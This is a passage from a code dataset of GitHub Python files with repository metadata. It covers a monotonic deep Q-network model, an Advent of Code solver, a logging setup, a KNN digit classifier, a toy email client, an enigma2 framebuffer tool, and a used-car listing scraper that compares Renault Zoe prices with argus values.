distribution representation.\r\n - stateEmbedding: Dimension of the state embedding.\r\n - numberOfSteps: Number of integration steps for the UMNN.\r\n - device: Hardware device (CPU or GPU).\r\n \r\n OUTPUTS: /\r\n \"\"\"\r\n\r\n # Call the constructor of the parent class (Pytorch torch.nn.Module)\r\n super(UMDQN_W_Model, self).__init__()\r\n\r\n # Initialization of the Deep Neural Network\r\n self.stateEmbeddingDNN = FeedForwardDNN(numberOfInputs, stateEmbedding, structureDNN)\r\n self.UMNN = MonotonicNN(stateEmbedding+1, structureUMNN, numberOfSteps, numberOfOutputs, device)\r\n\r\n \r\n def forward(self, state, taus):\r\n \"\"\"\r\n GOAL: Implementing the forward pass of the Deep Neural Network.\r\n \r\n INPUTS: - state: RL state.\r\n - taus: Samples of taus.\r\n \r\n OUTPUTS: - output: Output of the Deep Neural Network.\r\n \"\"\"\r\n \r\n # State embedding part of the Deep Neural Network\r\n batchSize = state.size(0)\r\n x = self.stateEmbeddingDNN(state)\r\n x = x.repeat(1, int(len(taus)/len(state))).view(-1, x.size(1))\r\n\r\n # UMNNN part of the Deep Neural Network\r\n x = self.UMNN(taus, x)\r\n\r\n # Appropriate format\r\n return torch.cat(torch.chunk(torch.transpose(x, 0, 1), batchSize, dim=1), 0)\r\n","repo_name":"ThibautTheate/Unconstrained-Monotonic-Deep-Q-Network-algorithm","sub_path":"Models/UMDQN_W_Model.py","file_name":"UMDQN_W_Model.py","file_ext":"py","file_size_in_byte":3111,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"37"} +{"seq_id":"13032819548","text":"import copy\nf = open(r\"2020\\python\\day17-input.txt\", \"r\")\n\ndef surroundingNumActive(grid, x, y, z):\n count = 0\n for z1 in range(z-1, z+2):\n for y1 in range(y-1, y+2):\n for x1 in range(x-1, x+2):\n if (x1, y1, z1) == (x, y, z):\n continue\n if (x1, y1, z1) in grid:\n count += 1\n return count\n\ndef printGrid(grid, xmin, xmax, ymin, ymax, zmin, zmax, counts=False):\n for z in range(zmin, zmax):\n print(\"\\nz=\" + str(z))\n for y in range(ymin, ymax):\n line = \"\"\n for x in range(xmin, xmax):\n if(counts):\n line += str(surroundingNumActive(grid, x, y, z))\n else:\n line += \"#\" if (x,y,z) in grid else \".\"\n print(line)\n\ngrid = set()\n\nx = 0\ny = 0\nz = 0\n\nxmax = 0\nymax = 0\nzmax = 1\nxmin = 0\nymin = 0\nzmin = 0\nfor line in f:\n for c in line.strip():\n if c == '#':\n grid.add((x,y,z))\n x += 1\n xmax = x\n \n y += 1\n x = 0\nymax = y\n\nprintGrid(grid, xmin, xmax, ymin, ymax, zmin-1, zmax+1, counts=True)\ninitialGrid = copy.deepcopy(grid)\n\nfor i in range(6):\n newGrid = copy.deepcopy(grid)\n\n for z in range(zmin-1, zmax+1):\n for y in range(ymin-1, ymax+1):\n for x in range(xmin-1, xmax+1):\n count = surroundingNumActive(grid, x, y, z)\n if (x,y,z) in grid:\n if count != 2 and count != 3:\n newGrid.remove((x,y,z))\n else:\n if count == 3:\n newGrid.add((x,y,z))\n\n grid = copy.deepcopy(newGrid)\n xmin -= 1\n ymin -= 1\n zmin -= 1\n xmax += 1\n ymax += 1\n zmax += 1\n printGrid(grid, xmin, xmax, ymin, ymax, zmin, zmax)\n\n\nprint(len(grid)) ","repo_name":"davidcbc/aoc","sub_path":"2020/python/day17-1.py","file_name":"day17-1.py","file_ext":"py","file_size_in_byte":1835,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"4794576184","text":"\"\"\"Handle routing output, errors, and exceptions to disk and screen\n\"\"\"\nimport logging\nimport sys\nimport time\nimport os\nimport uuid\nimport gnomon.Configuration as Configuration\n\n\ndef getLogLevels():\n \"Return log levels that Python's logging facilities understands\"\n return ['DEBUG', 'INFO', 'WARNING', 'ERROR', 'CRITICAL']\n\n\ndef addLogLevelOptionToArgs(parser):\n \"\"\"Add log level arguments to command line parser\n\n This is not in the schema because the log level needs to be known when\n setting up the Configuration classes\n \"\"\"\n parser.add_argument('--log_level',\n choices=getLogLevels(),\n default='INFO')\n\n\nclass StreamToLogger(object):\n \"Fake file-like stream object that redirects writes to a logger instance.\"\n\n def __init__(self, logger, log_level=logging.INFO):\n self.logger = logger\n self.log_level = log_level\n\n def write(self, buf):\n for line in buf.rstrip().splitlines():\n self.logger.log(self.log_level, line.rstrip())\n\n\ndef setupLogging(console_level, name):\n config = Configuration.GLOBAL_CONFIG\n\n output_filename = 'gnomon_%s_%s.log' % (name, str(uuid.uuid4()))\n\n output_filename = os.path.join(config['log_dir'],\n output_filename)\n\n logging.basicConfig(filename=output_filename, mode='w',\n level=logging.DEBUG)\n\n console_handler = logging.StreamHandler(sys.__stdout__)\n console_handler.setLevel(console_level)\n formatter = logging.Formatter('%(levelname)s(%(name)s): %(message)s')\n console_handler.setFormatter(formatter)\n\n logger = logging.getLogger('root')\n logger.addHandler(console_handler)\n\n stdout_logger = logging.getLogger('root').getChild('STDOUT')\n sl = StreamToLogger(stdout_logger, logging.INFO)\n sys.stdout = sl\n\n stderr_logger = logging.getLogger('root').getChild('STDERR')\n sl = StreamToLogger(stderr_logger, logging.ERROR)\n sys.stderr = sl\n\n logger.info('Starting up Gnomon (PID: %d)', os.getpid())\n\n logger.info('Using log filename: %s', output_filename)\n\n logger.info('Start time: %s', time.ctime())\n","repo_name":"nuSTORM/gnomon","sub_path":"gnomon/Logging.py","file_name":"Logging.py","file_ext":"py","file_size_in_byte":2081,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"8142829883","text":"\"\"\"\n날짜:2021/05/03\n이름:고현석\n내용:파이썬 예외처리 실습 교재 p212\n\n\"\"\"\n\n# n,m,k를 공백으로 구분하여 입력받기\nn,m,k = map(int,input().split())\n\n# n개의 숫자를 공���으로 구분하여 입력받기\ndata = list(map(int,input().split()))\n\n# 내림차순 정렬\ndata.sort(reverse=True)\n\n# 첫번째 숫자\nfirst = data[0]\n\n# 두번째 숫자\nsecond = data[1]\n\nresult = 0\nrepeat = k # k값을 보존해야함\nfor i in range(m):\n\n if repeat > 0:\n result += first\n repeat -= 1\n else:\n result += second\n repeat = k\n\nprint(result)\n\n","repo_name":"pkc-3/python","sub_path":"Codingtest/test1.py","file_name":"test1.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26709648412","text":"# CAP5415 Computer Vision\r\n# Programmin Assignment 2, Question 1\r\n# KNN Classifier for MNIST Dataset\r\n# Date: 11/9/2021\r\n# Author: Katarina Vuckovic\r\n\r\nfrom numpy import load\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport statistics\r\nimport time\r\nimport scipy\r\nfrom scipy import ndimage\r\nfrom sklearn import datasets, svm, metrics\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.datasets import load_digits\r\n\r\n\r\n\r\n# Define L2-norm function that is used to calculate the distance between two samples. \r\ndef l2norm(actual_value,predicted_value):\r\n l2 = np.sum(np.power((actual_value-predicted_value),2))\r\n return (l2)\r\n\r\n\r\n#implementation of NN \r\ndef NN(X_test,X_train,y_train):\r\n predicted_value = X_test\r\n i = 0\r\n l2 = np.zeros([len(X_train),1])\r\n for train in X_train:\r\n l2[i] = l2norm(train,predicted_value)\r\n i +=1\r\n #print(l2)\r\n predicted_digit = y_train[np.argmin(l2)]\r\n return predicted_digit\r\n\r\n#implemenration of KNN for K>=1\r\ndef KNN(X_test,X_train,y_train,K):\r\n predicted_value = X_test\r\n i = 0\r\n l2 = np.zeros([len(X_train),1])\r\n predicted_digit = np.zeros([K,1])\r\n for train in X_train:\r\n l2[i] = l2norm(train,predicted_value)\r\n i +=1\r\n #print(l2)'\r\n min_index = l2[:,0].argsort()[:K]\r\n pred_k_digits = y_train[min_index]\r\n (unique, counts) = np.unique(pred_k_digits, return_counts=True)\r\n if (np.max(counts)>0):\r\n pred = unique[np.argmax(counts)]\r\n else:\r\n print('error')\r\n return pred\r\n\r\n\r\n# Import data and split into testing and training datasets\r\ndigits = load_digits()\r\n# flatten the images\r\nn_samples = len(digits.images)\r\nprint(n_samples)\r\ndata = digits.images.reshape((n_samples, -1))\r\n# Split data such that testing is 500 samples\r\n# 500/1797 = 0.2777 (note: n_samples = 197)\r\nX_train, X_test, y_train, y_test = train_test_split( data, digits.target, test_size=0.2777, shuffle=False)\r\n\r\n\r\n# Calculating accuracy for NN (K=1)\r\nresult = np.zeros([len(y_test),1]) \r\npred = np.zeros([len(y_test),1]) \r\n#print(result)\r\nfor i in range(len(y_test)):\r\n pred[i] = NN(X_test[i,:],X_train,y_train)\r\n if(pred[i]==y_test[i]):\r\n result[i] = 1\r\n else:\r\n result[i] = 0\r\n\r\npercent = np.sum(result)/500\r\nprint('percentage correct for NN (k=1):',percent)\r\n\r\n# calculate accuracy for k>1\r\nresult = np.zeros([len(y_test),1]) \r\npred = np.zeros([len(y_test),1]) \r\nK = 7\r\nfor k in range(1,K+1):\r\n percent = 0\r\n print(k)\r\n for i in range(len(y_test)):\r\n pred[i] = KNN(X_test[i,:],X_train,y_train,k)\r\n if(pred[i]==y_test[i]):\r\n result[i] = 1\r\n else:\r\n result[i] = 0\r\n percent = np.sum(result)/500\r\n print('percentage correct for k =',k,': ',percent)\r\n","repo_name":"katarinavuckovic/CAP5415","sub_path":"PA2/KNN/KNN_MNIST.py","file_name":"KNN_MNIST.py","file_ext":"py","file_size_in_byte":2695,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"5232551156","text":"class Email:\r\n def __init__(self, from_address, subject_line, email_contents):\r\n self.from_address = from_address\r\n self.subject_line = subject_line\r\n self.email_contents = email_contents\r\n self.has_been_read = False\r\n self.is_spam = False\r\n \r\n def mark_as_read(self):\r\n self.has_been_read = True\r\n \r\n def mark_as_spam(self):\r\n self.is_spam = True\r\n \r\nclass Inbox:\r\n def __init__(self):\r\n self.emails = [] # Empty list\r\n \r\n def add_email(self, from_address, subject_line, email_contents):\r\n email = Email(from_address, subject_line, email_contents)\r\n self.emails.append(email) # Append new email objects to list\r\n \r\n def list_messages_from_sender(self, sender_address):\r\n # Build list of email objects if email.from = email.sender\r\n messages = [email for email in self.emails if email.from_address == sender_address] \r\n output = \"\"\r\n # Return output string of the subject line for those objects, with an index number\r\n for i, message in enumerate(messages):\r\n output += f\"{i} {message.subject_line}\\n\"\r\n return output\r\n \r\n def get_email(self, sender_address, index):\r\n #As above\r\n messages = [email for email in self.emails if email.from_address == sender_address]\r\n # Get email based on input index, return and mark as read\r\n email = messages[index]\r\n email.mark_as_read()\r\n return email\r\n \r\n def mark_as_spam(self, sender_address, index):\r\n # As above, but mark as spam\r\n messages = [email for email in self.emails if email.from_address == sender_address]\r\n email = messages[index]\r\n email.mark_as_spam()\r\n \r\n def get_unread_emails(self):\r\n # As above, but only get the subject line of unread emails\r\n unread_emails = [email.subject_line for email in self.emails if not email.has_been_read]\r\n # Return string of subject_line arguments separated by a \\n\r\n output = \"\" \r\n for email in unread_emails:\r\n output += f\"{email}\\n\"\r\n return output\r\n \r\n def get_spam_emails(self):\r\n # As above, but for spam only\r\n spam_emails = [email.subject_line for email in self.emails if email.is_spam]\r\n output = \"\"\r\n for email in spam_emails:\r\n output += f\"{email}\\n\"\r\n return output\r\n \r\n def delete(self, sender_address, index):\r\n # Delete email given address and index\r\n messages = [email for email in self.emails if email.from_address == sender_address]\r\n self.emails.remove(messages[index])\r\n\r\nusage_message = '''\r\nWelcome to the email system! What would you like to do?\r\n\r\ns - send email.\r\nl - list emails from a sender.\r\nr - read email.\r\nm - mark email as spam.\r\ngu - get unread emails.\r\ngs - get spam emails.\r\nd - delete email.\r\ne - exit this program.\r\n'''\r\n\r\ninbox = Inbox()\r\nuser_choice = \"\"\r\n\r\nwhile True:\r\n \r\n # Lowercase and remove spaces\r\n user_choice = input(usage_message).strip().lower() \r\n\r\n#=====#\r\n\r\n if user_choice == \"s\":\r\n # Send an email (Create a new Email object)\r\n sender_address = input(\"Enter the address of the sender:\\n\")\r\n subject_line = input(\"Enter the subject line of the email:\\n\")\r\n email_contents = input(\"Enter the contents of the email:\\n\")\r\n \r\n # Now add the email to the Inbox\r\n inbox.add_email(sender_address, subject_line, email_contents)\r\n \r\n # Print a success message\r\n print(\"Congratulations, your email has been sent!\\n\")\r\n print(f\"Subject: {subject_line}\\nFrom: {sender_address}\\nContents: {email_contents}\")\r\n\r\n#=====#\r\n \r\n elif user_choice == \"l\":\r\n\r\n # List all emails from a sender_address\r\n sender_address = input(\"Please enter the sender address:\\n\")\r\n \r\n # Now list all emails from this sender\r\n print(inbox.list_messages_from_sender(sender_address))\r\n\r\n#=====#\r\n\r\n elif user_choice == \"r\":\r\n \r\n # Step 1: show emails from the sender\r\n sender_address = input(\"Please enter the sender address:\\n\")\r\n \r\n # Step 2: show all emails from this sender (with indexes)\r\n messages = inbox.list_messages_from_sender(sender_address)\r\n print(messages)\r\n \r\n # Step 3: ask the user for the index of the email\r\n email_index = int(input(\"Please enter the index of the email that you would like to read:\\n\"))\r\n \r\n # Step 4: display the email\r\n email = inbox.get_email(sender_address, email_index)\r\n print(f\"Subject Line: {email.subject_line}\\nFrom Address: {email.from_address}\\nEmail Contents: {email.email_contents}\")\r\n\r\n#=====#\r\n \r\n elif user_choice == \"m\":\r\n\r\n # Step 1: show emails from the sender\r\n sender_address = input(\"Please enter the sender address:\\n\")\r\n \r\n # Step 2: show all emails from this sender (with indexes)\r\n messages = inbox.list_messages_from_sender(sender_address)\r\n print(messages)\r\n \r\n # Step 3: ask the user for the index of the email\r\n email_index = int(input(\"Please enter the index of the spam email:\\n\"))\r\n \r\n # Step 4: mark the email as spam\r\n inbox.mark_as_spam(sender_address, email_index)\r\n\r\n # Step 5: print a success message\r\n print(\"Email has been marked as spam\")\r\n\r\n#=====#\r\n \r\n elif user_choice == \"gu\":\r\n \r\n # Get unread emails\r\n print(inbox.get_unread_emails())\r\n\r\n#=====#\r\n \r\n elif user_choice == \"gs\":\r\n \r\n # Get spam emails\r\n print(inbox.get_spam_emails())\r\n\r\n#=====#\r\n\r\n elif user_choice == \"d\":\r\n\r\n # Step 1: show emails from the sender\r\n sender_address = input(\"Please enter the sender address:\\n\")\r\n\r\n # Step 2: show all emails from this sender (with indexes)\r\n messages = inbox.list_messages_from_sender(sender_address)\r\n print(messages)\r\n\r\n # Step 3: ask the user for the index of the email\r\n email_index = int(input(\"Please enter the index of the spam email:\\n\"))\r\n\r\n # Step 4: delete the email\r\n inbox.delete(sender_address, email_index)\r\n\r\n # Step 5: print a success message\r\n print(\"Email has been deleted\")\r\n\r\n pass\r\n else:\r\n print(\"Oops - incorrect input\")","repo_name":"liambiam/Email-Client","sub_path":"email.py","file_name":"email.py","file_ext":"py","file_size_in_byte":6440,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"75171056746","text":"# -*- coding: utf-8 -*-\n\n# Kraven Tool\n#\n# Coded/Modified/Adapted by örlgrey\n# Based on VTi and/or OpenATV image source code\n#\n# This code is licensed under the Creative Commons \n# Attribution-NonCommercial-ShareAlike 3.0 Unported \n# License. To view a copy of this license, visit\n# http://creativecommons.org/licenses/by-nc-sa/3.0/ \n# or send a letter to Creative Commons, 559 Nathan \n# Abbott Way, Stanford, California 94305, USA.\n#\n# If you think this license infringes any rights,\n# please contact me at ochzoetna@gmail.com\n\nfrom enigma import eTimer\nfrom Screens.InfoBar import InfoBar\n\nclass KravenTool:\n\n\tdef __init__(self):\n\t\tself.fb_proc_path = '/proc/stb/vmpeg'\n\t\tself.fb_info = ['dst_width',\n\t\t 'dst_height',\n\t\t 'dst_left',\n\t\t 'dst_top']\n\t\tself.new_fb_size_pos = None\n\t\tself.decoder = None\n\t\tself.delayTimer = None\n\t\tself.is_PiG = False\n\t\treturn\n\n\tdef getFBSize(self, decoder = 0):\n\t\tret = []\n\t\tfor val in self.fb_info:\n\t\t\tf = open('%s/%d/%s' % (self.fb_proc_path, decoder, val), 'r')\n\t\t\tfb_val = f.read().strip()\n\t\t\tret.append(fb_val)\n\t\t\tf.close()\n\n\t\tif len(ret) == 4:\n\t\t\treturn ret\n\t\telse:\n\t\t\treturn None\n\n\tdef setFBSize(self, fb_size_pos, decoder = 0, force = False):\n\t\tif self.delayTimer:\n\t\t\tself.delayTimer.stop()\n\t\tif InfoBar.instance and InfoBar.instance.session.pipshown or force:\n\t\t\tif fb_size_pos and len(fb_size_pos) >= 4:\n\t\t\t\ti = 0\n\t\t\t\tfor val in self.fb_info:\n\t\t\t\t\ttry:\n\t\t\t\t\t\tf = open('%s/%d/%s' % (self.fb_proc_path, decoder, val), 'w')\n\t\t\t\t\t\tfb_val = fb_size_pos[i]\n\t\t\t\t\t\tf.write(fb_val)\n\t\t\t\t\t\tf.close()\n\t\t\t\t\texcept IOError:\n\t\t\t\t\t\tpass\n\n\t\t\t\t\ti += 1\n\n\t\t\t\tfor val in ('00000001', '00000000'):\n\t\t\t\t\ttry:\n\t\t\t\t\t\tf = open('%s/%d/%s' % (self.fb_proc_path, decoder, 'dst_apply'), 'w')\n\t\t\t\t\t\tf.write(val)\n\t\t\t\t\t\tf.close()\n\t\t\t\t\texcept IOError:\n\t\t\t\t\t\tpass\n\n\tdef delayTimerFinished(self):\n\t\tfb_size_pos = self.new_fb_size_pos\n\t\tdecoder = self.decoder\n\t\tself.new_fb_size_pos = None\n\t\tself.decoder = None\n\t\tif not self.is_PiG:\n\t\t\tself.setFBSize(fb_size_pos, decoder)\n\t\treturn\n\n\tdef setFBSize_delayed(self, fb_size_pos, decoder = 0, delay = 1000):\n\t\tif fb_size_pos and len(fb_size_pos) >= 4:\n\t\t\tself.new_fb_size_pos = fb_size_pos\n\t\t\tself.decoder = decoder\n\t\t\tself.delayTimer = eTimer()\n\t\t\tself.delayTimer.callback.append(self.delayTimerFinished)\n\t\t\tself.delayTimer.start(delay)\n","repo_name":"oerlgrey/KravenHD","sub_path":"usr/lib/enigma2/python/Plugins/Extensions/KravenHD/tool.py","file_name":"tool.py","file_ext":"py","file_size_in_byte":2300,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"21388858098","text":"import requests\nfrom bs4 import BeautifulSoup\nfrom multiprocessing import Pool\nimport time\nimport pylev\nimport pandas as pd\nimport re\nimport os\nimport matplotlib as plt\nimport seaborn\n\n\n# url = 'https://www.leboncoin.fr/voitures/offres/ile_de_france/?th=1&q=Renault%20Zoe&parrot=0'\nurl_base = 'https://www.leboncoin.fr/voitures/offres/{0}/?th=1&q=Renault%20Zoe&parrot=0'\ndf_zoe = pd.DataFrame(\n columns=['region', 'url', 'price', 'year', 'kilometrage', 'version', 'telephone', 'description', 'vendeur',\n 'argus'])\nregion_list_full = ('ile_de_france', 'provence_alpes_cote_d_azur', 'aquitaine')\n\n\ndef car_url_list(region, url):\n result = requests.get(url).text\n soup = BeautifulSoup(result, 'html.parser')\n df_zoe_tmp1 = pd.DataFrame(\n columns=['region', 'url', 'price', 'year', 'kilometrage', 'version', 'telephone', 'description', 'vendeur',\n 'argus'])\n\n for index_url in range(len(soup.main.find_all('ul')[0].find_all('li'))):\n ad_list_id = soup.main.find_all('ul')[0].find_all('li')[int(index_url)] \\\n .a['data-info'].split(',')[2].split(':')[1].replace('\"', '').replace(' ', '')\n\n # is_pro = soup.main.find_all('ul')[0].find_all('li')[int(el)].find_all(class_='ispro').text\n # BeautifulSoup(requests.get('https://www.leboncoin.fr/voitures/offres/ile_de_france/?th=1&q=Renault%20Zoe&parrot=0').text, 'html.parser').main.find_all('ul')[0].find_all('li')[int(el)].find_all(class_='ispro').text\n\n new_url = soup.main.find_all('ul')[0].find_all('li')[int(index_url)].a['href'].replace('//', 'https://')\n\n df_zoe_tmp1 = df_zoe_tmp1.append([{'id': ad_list_id, 'region': region, 'url': new_url}], ignore_index=True)\n\n return df_zoe_tmp1\n\n\ndef extract_urls_car(region_list, url_b):\n df_zoe_tmp2 = pd.DataFrame(\n columns=['region', 'url', 'price', 'year', 'kilometrage', 'version', 'telephone', 'description', 'vendeur',\n 'argus'])\n\n for region_i in region_list:\n df_zoe_tmp2 = pd.concat([df_zoe_tmp2, car_url_list(region_i, url_b.format(region_i))])\n df_zoe_tmp2.reset_index()\n return df_zoe_tmp2\n\n\ndef extract_characteristics(url, region_url):\n df_zoe_tmp3 = pd.DataFrame(\n columns=['region', 'url', 'price', 'year', 'kilometrage', 'version', 'telephone', 'description', 'vendeur',\n 'argus'])\n result = requests.get(url).text\n soup = BeautifulSoup(result, 'html.parser')\n\n vendeur_tmp = soup.find_all(class_='line line_pro noborder')[0].text\n if re.search(\"(?i)(Num(é|e)ro)( )*(SIREN)(\\s*:*\\s*)(?P\\w+)\", vendeur_tmp) is not None:\n vendeur = 'Numéro SIREN : ' + re.search(\"(?i)(Num(é|e)ro)( )*(SIREN)(\\s*:*\\s*)(?P\\w+)\", vendeur_tmp)\\\n .group('siren')\n else:\n vendeur = 'Particulier'\n\n characteristics_price_tmp = (soup.find_all(class_='line')[2].text.replace(' ', '') \\\n .replace(u'\\n', '').replace('nan', '') \\\n .replace('Prix', '').replace(u'\\xa0', '').replace('€', ''))\n\n if re.search('([0-9]+)', characteristics_price_tmp) is not None:\n characteristics_price = float(re.search('([0-9]+)', characteristics_price_tmp).group(0))\n else:\n characteristics_price = 0\n\n\n characteristics_year_tmp = soup.find_all(class_='line')[6].text.replace(' ', '') \\\n .replace(u'\\n', '').replace(u'\\xa0', '').replace('Année-modèle', '')\n\n if re.search('([0-9]+)', characteristics_year_tmp) is not None:\n characteristics_year = re.search('([0-9]+)', characteristics_year_tmp).group(0)\n else:\n characteristics_year = 0\n\n\n characteristics_kilometrage_tmp = soup.find_all(class_='line')[7].text.replace('Kilométrage', '').replace('KM', '')\\\n .replace(' ', '').replace(u'\\n', '').replace(u'\\xa0', '').replace(u'\\t', '')\n\n if re.search('([0-9]+)', characteristics_kilometrage_tmp) is not None:\n characteristics_kilometrage = re.search('([0-9]+)', characteristics_kilometrage_tmp).group(0)\n else:\n characteristics_kilometrage = 0\n\n\n # commande synthetique\n # .select(\".tabscontent > ul > li > a\")\n\n characteristics_version_full = soup.find_all(class_='no-border')[0].text\n\n # soup.text.replace(u'\\n', '').replace(u'\\t', '').strip()\n\n characteristics_description = soup.find_all(class_='line properties_description')[0].text.replace(u'\\n', '') \\\n .replace('Description :', '')\n\n if re.search('((0|\\\\+33|0033)[1-9][0-9]{8})|((0|\\\\+33|0033)[1-9] [0-9]{2} [0-9]{2} [0-9]{2} [0-9]{2})|((0|\\\\+33|0033)[1-9].[0-9]{2}.[0-9]{2}.[0-9]{2}.[0-9]{2})', characteristics_description) is not None:\n tel_clean = re.search('((0|\\\\+33|0033)[1-9][0-9]{8})|((0|\\\\+33|0033)[1-9] [0-9]{2} [0-9]{2} [0-9]{2} [0-9]{2})|((0|\\\\+33|0033)[1-9].[0-9]{2}.[0-9]{2}.[0-9]{2}.[0-9]{2})', characteristics_description).group(0)\n else:\n tel_clean = 'NaN'\n\n\n\n if re.search('(INTENS|ZEN|LIFE)', characteristics_version_full.upper()) is not None:\n version_clean = re.search('(INTENS|ZEN|LIFE)', characteristics_version_full.upper()).group(0)\n if re.search('(TYPE(\\s)?2)', characteristics_version_full.upper()) is not None:\n version_clean = version_clean + ' ' + re.search('(TYPE(\\s)?2)', characteristics_version_full.upper()).group(0)\n else:\n if re.search('(INTENS|ZEN|LIFE)', soup.main.h1.text.upper()) is not None:\n version_clean = re.search('(INTENS|ZEN|LIFE)', soup.main.h1.text.upper()).group(0)\n if re.search('(TYPE(\\s)?2)', soup.main.h1.text.upper()) is not None:\n version_clean = version_clean + ' ' + re.search('(TYPE(\\s)?2)', soup.main.h1.text.upper()).group(0)\n else:\n version_clean = 'LIFE'\n\n\n df_zoe_tmp3 = df_zoe_tmp3.append([{'region': region_url,\n 'url': url,\n 'price': characteristics_price,\n 'year': characteristics_year,\n 'kilometrage': characteristics_kilometrage,\n 'version': version_clean,\n 'telephone': tel_clean,\n 'description': characteristics_description,\n 'vendeur': vendeur}], ignore_index=True)\n return df_zoe_tmp3\n\n\n# Pool.map(extract_characteristics(), listURLGlob)\n\ndef save_car_data(df_url_to_crawl):\n for url_car in df_url_to_crawl['url']:\n df_zoe_tmp4 = pd.DataFrame(\n columns=['region', 'url', 'price', 'year', 'kilometrage', 'version', 'telephone', 'description', 'vendeur',\n 'argus'])\n df_zoe_tmp4 = extract_characteristics(url_car, df_url_to_crawl[df_url_to_crawl['url'] == url_car]['region'])\n\n df_url_to_crawl.loc[df_url_to_crawl.url == url_car, 'price'] = float(df_zoe_tmp4[df_zoe_tmp4['url'] == url_car][\n 'price'].values)\n df_url_to_crawl.loc[df_url_to_crawl.url == url_car, 'year'] = df_zoe_tmp4[df_zoe_tmp4['url'] == url_car][\n 'year'].values\n df_url_to_crawl.loc[df_url_to_crawl.url == url_car, 'kilometrage'] = df_zoe_tmp4[df_zoe_tmp4['url'] == url_car][\n 'kilometrage'].values\n df_url_to_crawl.loc[df_url_to_crawl.url == url_car, 'version'] = df_zoe_tmp4[df_zoe_tmp4['url'] == url_car][\n 'version'].values\n df_url_to_crawl.loc[df_url_to_crawl.url == url_car, 'telephone'] = df_zoe_tmp4[df_zoe_tmp4['url'] == url_car][\n 'telephone'].values\n df_url_to_crawl.loc[df_url_to_crawl.url == url_car, 'description'] = df_zoe_tmp4[df_zoe_tmp4['url'] == url_car][\n 'description'].values\n df_url_to_crawl.loc[df_url_to_crawl.url == url_car, 'vendeur'] = df_zoe_tmp4[df_zoe_tmp4['url'] == url_car][\n 'vendeur'].values\n return df_url_to_crawl\n\n\ndef export_data_car(df):\n path = os.path.realpath('')\n df.to_csv(path + '/dataset_zoe.csv', sep=';', header=True, index=False)\n\n\n# Récupérer toutes les versions existantes par année pour comparaison avec la description du boncoin\ndef get_argus(db_zoe):\n root_path = 'http://www.lacentrale.fr/'\n df_argus = pd.DataFrame(\n columns=['year', 'url_c', 'version', 'argus'])\n\n for el in db_zoe[['year']].drop_duplicates().values:\n if str(el[0])[:2] == '20' and el[0] != '':\n caract_year = str(el[0])\n url_global_search = 'http://www.lacentrale.fr/cote-voitures-renault-zoe--' + str(el[0]) + '-.html'\n\n reqests_glob = requests.get(url_global_search)\n glob_soup = BeautifulSoup(reqests_glob.text, \"html.parser\")\n\n for el_tmp in glob_soup.find_all(class_=\"listingResultLine f14 auto\"):\n caract_url = el_tmp.a.attrs['href']\n caract_version = el_tmp.a.h3.text\n\n url_tmp = root_path + caract_url\n requests_argus_tmp = requests.get(url_tmp)\n argus_soup_tmp = BeautifulSoup(requests_argus_tmp.text, \"html.parser\")\n argus_price_tmp = (argus_soup_tmp.find_all(\"strong\", class_=\"f24\")[0].text.replace(' ', '') \\\n .replace(u'\\n', '').replace('nan', '') \\\n .replace('Prix', '').replace(u'\\xa0', '').replace('€', ''))\n\n if re.search('([0-9]+)', argus_price_tmp) is not None:\n argus_price = float(re.search('([0-9]+)', argus_price_tmp).group(0))\n else:\n argus_price = 0\n\n print(str(caract_year) + ' : ' + str(caract_version) + ' : ' + str(url_tmp) + ' : ' + str(argus_price))\n df_argus = df_argus.append([{'year': caract_year\n , 'url_c': url_tmp\n , 'version': caract_version\n , 'argus': argus_price}]\n , ignore_index=True)\n\n path = os.path.realpath('')\n df_argus.to_csv(path + '/dataset_argus_zoe.csv', sep=';', header=True, index=False)\n return df_argus\n\n# Mise à jour du Dataframe zoe avec l'argus avec le calcul de la distance Levenshtein\ndef maj_argus_zoe(db_zoe, df_argus):\n for el in db_zoe['id']:\n text_description = db_zoe[db_zoe['id'] == el]['description'].values\n text_version = db_zoe[db_zoe['id'] == el]['version'].values\n year_tmp = db_zoe[db_zoe['id'] == el]['year'].values[0]\n if str(year_tmp)[:2] == '20' and year_tmp != '':\n df_argus_tmp = df_argus[df_argus.year == year_tmp]\n else:\n df_argus_tmp = df_argus\n\n for el_argus in df_argus_tmp['version'].values:\n df_argus_sub_tmp = df_argus_tmp\n\n # Recherche de la version de zoe 'La centrale' la plus proche de la version leboncoin (titre/decription)\n df_argus_tmp.loc[df_argus_tmp.version == el_argus, 'select'] = pylev.levenshtein(text_description, str(el_argus))\n df_argus_sub_tmp.loc[df_argus_sub_tmp.version == el_argus, 'select'] = pylev.levenshtein(text_version,\n str(el_argus))\n df_argus_fin_tmp = df_argus_tmp.append(df_argus_sub_tmp)\n distance_min = df_argus_fin_tmp['select'].min()\n\n argus_price = df_argus_fin_tmp[df_argus_fin_tmp['select'] == distance_min]['argus'].values[0]\n db_zoe.loc[db_zoe.id == el, 'argus'] = float(argus_price)\n db_zoe.loc[db_zoe.id == el, 'official_version'] = el_argus\n return db_zoe\n\n# Indicateur de bonnes affaires\ndef select_good_deal(db_zoe_to_select):\n db_zoe_to_select['good_deal'] = db_zoe_to_select['price'] / db_zoe_to_select['argus']\n db_zoe_to_select['select_deal'] = db_zoe_to_select['good_deal'].apply(lambda x: True if x < 1 else False)\n return db_zoe_to_select\n\n\n\n\n# Alimentation du dateframe initial\ndf_zoe = extract_urls_car(region_list_full, url_base)\ndf_zoe_more = save_car_data(df_zoe)\n\ndf_argus = get_argus(df_zoe_more)\n\ndf_zoe_maj = maj_argus_zoe(df_zoe_more, df_argus)\n\ndf_zoe_final = 